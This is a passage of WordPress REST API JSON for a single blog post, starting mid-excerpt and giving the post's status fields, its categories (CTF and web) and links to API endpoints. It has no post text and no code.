[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-882","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/882","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=882"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/882\/revisions"}],"predecessor-version":[{"id":885,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/882\/revisions\/885"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=882"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=882"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=882"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}